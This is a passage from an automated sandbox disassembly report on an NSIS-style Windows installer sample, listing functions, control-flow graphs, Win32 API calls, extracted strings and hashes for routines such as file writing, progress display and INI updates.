                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425576,755723A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425576,755723A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425576,755723A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                  • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
                                                                                                                                                                                                                                                                  • API String ID: 4286501637-2478300759
                                                                                                                                                                                                                                                                  • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                  • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                                                                                                                                                                                                                                                  Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 638 40375f-403765 609->638 610->606 636 403797-4037a8 610->636 614 403670-403677 611->614 615 4037e9-4037f0 call 4032d2 611->615 616 4036f3-4036f7 614->616 617 403679-40368d call 405e38 614->617 615->606 623 403701-403707 616->623 624 4036f9-403700 call 4032d2 616->624 617->623 634 40368f-403696 617->634 627 403716-403720 623->627 628 403709-403713 call 4072ad 623->628 624->623 627->602 635 403726 627->635 628->627 634->623 640 403698-40369f 634->640 635->600 641 4037b0-4037b3 636->641 642 4037aa 636->642 638->606 638->610 640->623 643 4036a1-4036a8 640->643 644 4037b6-4037be 641->644 642->641 643->623 645 4036aa-4036b1 643->645 644->644 646 4037c0-4037db SetFilePointer call 405e38 644->646 645->623 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->623 653 4036ef-4036f1 651->653 652->635 652->651 653->623
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                                                                                                    • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                    • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • Inst, xrefs: 00403698
                                                                                                                                                                                                                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                                                  • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                                                  • Null, xrefs: 004036AA
                                                                                                                                                                                                                                                                  • soft, xrefs: 004036A1
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                  • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                  • API String ID: 4283519449-527102705
                                                                                                                                                                                                                                                                  • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                  • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                                                                                                                                                                                                                                                  Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 175fileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                                  • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00425576,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                  • String ID: (]C$... %d%%$pAB$vUB
                                                                                                                                                                                                                                                                  • API String ID: 651206458-1566941925
                                                                                                                                                                                                                                                                  • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                  • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                                                                                                                                                                                                                                                  Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(00445D80,00425576,755723A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(004034E5,00445D80,00425576,755723A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425576,755723A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                  • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                    • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425576,755723A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2740478559-0
                                                                                                                                                                                                                                                                  • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                  • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                                                                                                                                                                                                                                                  Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f69 GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 745 401f6e-401f7b 732->745 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 751 402387-40238d GlobalFree 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 750 4030e3-4030f2 742->750 745->750 745->751 762 402708-40270e 747->762 751->750 762->750
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402387
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                  • String ID: Exch: stack < %d elements$Pop: stack empty$open
                                                                                                                                                                                                                                                                  • API String ID: 1459762280-1711415406
                                                                                                                                                                                                                                                                  • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                  • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                                                                                                                                                                                                  Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 764 402713-40273b call 406035 * 2 769 402746-402749 764->769 770 40273d-402743 call 40145c 764->770 772 402755-402758 769->772 773 40274b-402752 call 40145c 769->773 770->769 776 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 772->776 777 40275a-402761 call 40145c 772->777 773->772 777->776
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                  • String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
                                                                                                                                                                                                                                                                  • API String ID: 247603264-1827671502
                                                                                                                                                                                                                                                                  • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                  • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                                                                                                                                                                                                                                  Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 785 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 796 402223-4030f2 call 4062cf 785->796 797 40220d-40221b call 4062cf 785->797 797->796
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425576,755723A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425576,755723A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425576,755723A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                  • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                  • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                  • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                  • API String ID: 3156913733-2180253247
                                                                                                                                                                                                                                                                  • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                  • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                                                                                                                                                                                                                                  Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 805 405eab-405eb7 806 405eb8-405eec GetTickCount GetTempFileNameW 805->806 807 405efb-405efd 806->807 808 405eee-405ef0 806->808 810 405ef5-405ef8 807->810 808->806 809 405ef2 808->809 809->810
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00405EC9
